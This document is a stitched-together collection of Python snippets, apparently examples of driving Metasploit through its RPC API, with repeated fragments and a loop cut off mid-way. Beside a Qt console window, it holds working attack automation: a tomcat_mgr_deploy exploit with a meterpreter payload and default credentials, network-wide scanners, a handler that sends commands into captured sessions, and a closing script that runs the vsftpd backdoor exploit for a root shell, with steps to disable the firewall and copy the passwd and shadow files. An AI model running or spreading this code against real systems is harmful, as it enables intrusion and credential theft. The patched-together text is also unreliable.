def _msfInit(self, msfrpc, **kwargs):
self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'),
self._getOutput)
self.prompt = 'msf >'
self.c = MsfRpcConsole(msfrpc,
sessionid=kwargs.get('sessionid'),
cb=self._emitSignal)
if 'command' in kwargs:
self.commanderLineEdit.setText(kwargs['command'])
self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
class MsfShellWindow(QMainWindow, Ui_MainWindow):
def __init__(self, msfrpc, **kwargs):
QMainWindow.__init__(self, kwargs.pop('parent', None))
self.setupUi(self)
self.setWindowTitle('Metasploit Console')
self._initCommandLine()
self._msfInit(msfrpc, **kwargs)
def _msfInit(self, msfrpc, **kwargs):
self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'),
self._getOutput)
self.prompt = 'msf >'
self.c = MsfRpcConsole(msfrpc,
sessionid=kwargs.get('sessionid'),
cb=self._emitSignal)
if 'command' in kwargs:
self.commanderLineEdit.setText(kwargs['command'])
self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
def _emitSignal(self, d):
self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))
def _initCommandLine(self):
self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'),
self._sendCommand)
self.vb = self.outputTextBrowser.verticalScrollBar()
def _sendCommand(self):
c = self.outputTextBrowser.textCursor()
c.movePosition(QTextCursor.End)
self.outputTextBrowser.setTextCursor(c)
cmd = str(self.commanderLineEdit.text())
if cmd == 'exit':
self.close()
return
self.c.execute(cmd)
self.outputTextBrowser.insertHtml('%s<br>' % cmd)
self.commanderLineEdit.clear()
self.vb.setValue(self.vb.maximum())
def _getOutput(self, d):
d = eval(str(d))
self.prompt = d['prompt']
self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
self.outputTextBrowser.insertHtml(
'<font color="red"><b>%s</b></font><font color="black"> </font>'
% self.prompt)
self.vb.setValue(self.vb.maximum())
def closeEvent(self, event):
self.c.__del__()
QMainWindow.close(self)
def _msfInit(self, msfrpc, **kwargs):
self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
self.prompt = 'msf >'
self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'),cb=self._emitSignal)
if 'command' in kwargs:
self.commanderLineEdit.setText(kwargs['command'])
self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
def __init__(self, password, rpcport, listenerport, payload):
self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport)
self.consolebuffer = []
self.listenerconsole = MsfRpcConsole(self.interactorclient,
cb=self.appendtoconsolebuffer)
self.listenerconsole.execute('use exploit/multi/handler')
self.listenerconsole.execute('set PAYLOAD ' + payload)
self.listenerconsole.execute('set LPORT ' + str(listenerport))
self.listenerconsole.execute('set LHOST 0.0.0.0')
self.listenerconsole.execute('set ExitOnSession false')
self.listenerconsole.execute('exploit -j')
self.currentsessionid = None
self.currentshell = None
class MsfShellWindow(QMainWindow, Ui_MainWindow):
def __init__(self, msfrpc, **kwargs):
QMainWindow.__init__(self, kwargs.pop('parent', None))
self.setupUi(self)
self.setWindowTitle('Metasploit Console')
self._initCommandLine()
self._msfInit(msfrpc, **kwargs)
def _msfInit(self, msfrpc, **kwargs):
self.connect(self.outputTextBrowser, SIGNAL('textChanged(QString)'), self._getOutput)
self.prompt = 'msf >'
self.c = MsfRpcConsole(msfrpc, sessionid=kwargs.get('sessionid'),cb=self._emitSignal)
if 'command' in kwargs:
self.commanderLineEdit.setText(kwargs['command'])
self.commanderLineEdit.emit(SIGNAL('returnPressed()'))
def _emitSignal(self, d):
self.outputTextBrowser.emit(SIGNAL('textChanged(QString)'), repr(d))
def _initCommandLine(self):
self.connect(self.commanderLineEdit, SIGNAL('returnPressed()'), self._sendCommand)
self.vb = self.outputTextBrowser.verticalScrollBar()
def _sendCommand(self):
c = self.outputTextBrowser.textCursor()
c.movePosition(QTextCursor.End)
self.outputTextBrowser.setTextCursor(c)
cmd = str(self.commanderLineEdit.text())
if cmd == 'exit':
self.close()
return
self.c.execute(cmd)
self.outputTextBrowser.insertHtml('%s<br>' % cmd)
self.commanderLineEdit.clear()
self.vb.setValue(self.vb.maximum())
def _getOutput(self, d):
d = eval(str(d))
self.prompt = d['prompt']
self.outputTextBrowser.insertPlainText('\n%s\n' % d['data'])
self.outputTextBrowser.insertHtml('<font color="red"><b>%s</b></font><font color="black"> </font>' % self.prompt)
self.vb.setValue(self.vb.maximum())
def closeEvent(self, event):
self.c.__del__()
QMainWindow.close(self)
def init_metasploit(rhosts):
config.read('vuln.ini')
rhosts = rhosts
vuln = config['Settings']['VULN']
threads = config['Settings']['THREADS']
exploit = config['Settings']['EXPLOIT']
client = MsfRpcClient('password')
# cb - callback function, executes when data arrives to console
console = MsfRpcConsole(client, cb=read_console)
print("RHOSTS TO USE: " )#+ rhosts)
print("VULNERABILITY TO CHECK: " + vuln)
print("THREADS TO USE: " + threads)
print("EXPLOIT TO USE: " + exploit)
time.sleep(2)
return console, rhosts, vuln, threads, exploit
def __init__(self, password, **kwargs):
self.fl = True
self.client = MsfRpcConsole(MsfRpcClient(password, **kwargs), cb=self.callback)
InteractiveConsole.__init__(self, {'rpc': self.client})
self.init_history(path.expanduser('~/.msfconsole_history'))
def console_reader(data_in_console):
status_of_console = data_in_console['busy']
console_data = data_in_console['data'].rstrip().split('\n')
for line in console_data:
if '[+]' in line:
line_with_positive.append(line)
elif 'exploit/' in line:
line_with_exploit.append(line)
else:
line_with_out.append(line)
print status_of_console
client = MsfRpcClient("hocine")
console = MsfRpcConsole(client, cb=console_reader)
#utile.parcer_result_scannig("result_of_scannig.csv")
list_cve = []
list_host_exploit = []
list_temp = list()
hitgh_vul = open("high_vul.csv", "r")
lines = csv.reader(hitgh_vul)
for line in lines:
list_cve = line[1].split(',')
line[1] = ""
for cve in list_cve:
console.execute("search " + str(cve) + "")
time.sleep(5)
from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
client = MsfRpcClient('123456', user='******')
print dir(console)
auxilary = client.modules.auxiliary
for i in auxilary:
print "\t%s" % i
scan = client.modules.use('auxiliary', 'scanner/ssh/ssh_version')
scan.description
scan.required
scan['VERBOSE'] = True
scan['RHOSTS'] = '192.168.1.119'
print scan.execute()
console = MsfRpcConsole(client)
console.execute('use scanner/ssh/ssh_version')
console.execute('set RHOSTS 192.168.1.119')
console.execute('set VERBOSE True')
console.execute('run')
exploits = client.modules.exploits
for exploit in exploits:
print("\t%s" % exploit)
scan = client.modules.use('exploits', 'multi/http/tomcat_mgr_deploy')
scan.description
scan.required
scan['RHOST'] = '192.168.100.2'
scan['RPORT'] = '8180'
scan['PATH'] = '/manager'
scan['HttpUsername'] = '******'
scan['HttpPassword'] = '******'
scan['payload'] = 'java/meterpreter/bind_tcp'
print(scan.execute())
console = MsfRpcConsole(client)
console.execute('use exploit/multi/http/tomcat_mgr_deploy')
console.execute('set RHOST 192.168.100.2')
console.execute('set RPORT 8180')
console.execute('set PATH /manager')
console.execute('set HttpUsername tomcat')
console.execute('set HttpPassword tomcat')
console.execute('set payload java/meterpreter/bind_tcp')
console.execute('run')
def read_console(console_data):
global global_console_status
global_console_status = console_data['busy']
if '[+]' in console_data['data']:
sigdata = console_data['data'].rstrip().split('\n')
for line in sigdata:
if '[+]' in line:
global_positive_out.append(line)
client = MsfRpcClient('password')
# cb - callback function, executes when data arrives to console
console = MsfRpcConsole(client, cb=read_console)
time.sleep(10)
console.execute('use auxiliary/scanner/ftp/ftp_version')
console.execute('set RHOSTS 192.168.0.0/24')
console.execute('set THREADS 20')
console.execute('run')
time.sleep(5)
while global_console_status:
print 'global_console_status: ' + str(global_console_status)
time.sleep(5)
time.sleep(5)
targets = list()
for line in global_positive_out:
class MetasploitInteractor():
def __init__(self, password, rpcport, listenerport, payload):
self.interactorclient = MsfRpcClient(password, ssl=False, port=rpcport)
self.consolebuffer = []
self.listenerconsole = MsfRpcConsole(self.interactorclient,
cb=self.appendtoconsolebuffer)
self.listenerconsole.execute('use exploit/multi/handler')
self.listenerconsole.execute('set PAYLOAD ' + payload)
self.listenerconsole.execute('set LPORT ' + str(listenerport))
self.listenerconsole.execute('set LHOST 0.0.0.0')
self.listenerconsole.execute('set ExitOnSession false')
self.listenerconsole.execute('exploit -j')
self.currentsessionid = None
self.currentshell = None
def writetoconsole(self, data):
self.listenerconsole.execute(data)
def appendtoconsolebuffer(self, consoledata):
self.consolebuffer.append(consoledata)
def readconsole(self):
unread = self.consolebuffer
self.consolebuffer = []
return unread
def getsessions(self, verbose=False):
if verbose:
return self.interactorclient.sessions.list.items()
else:
return [[sessionid, sessionmeta['info'], sessionmeta['username']]
for sessionid, sessionmeta in
self.interactorclient.sessions.list.items()]
def sendcommandtosession(self, sessionid, command):
if sessionid != self.currentsessionid:
try:
self.currentshell = self.interactorclient.sessions.session(
sessionid)
except KeyError:
return "Error, session does not exist"
self.currentsessionid = sessionid
try:
self.currentshell.write(command)
resp = self.currentshell.read()
except (metasploit.msfrpc.MsfRpcError, httplib.CannotSendRequest):
return "Error, session died"
return resp
from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
import os
import sys
import string
import time
#connecting to metasploit server
#make sure msdb and postgresql are up
os.system("nmap -v -n -p- 192.168.1.24 > /home/PortsAndPortTypes.txt")
os.system("gnome-terminal -e 'msfrpcd -P abc123 -f -a 127.0.0.1'")
#sleep needed to allow metasploit server to set up
time.sleep(10)
client = MsfRpcClient('abc123', ssl=True, port='55553')
console = MsfRpcConsole(client)
#setting up the use of the exploit and payload
exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
exploit['RHOSTS'] = '192.168.1.24'
exploit['VERBOSE'] = True
exploit.execute(payload='cmd/unix/interact')
#sleep needed to allow session(1) (root) to connect to LHOST
time.sleep(15)
#writing the shell commands in root
shell = client.sessions.session(1)
#disabling security
print "Disabling security...\n"
#shell.write("sudo ufw disable\n")
print "Copying the password file...\n"
print "Copying the shadow password file...\n"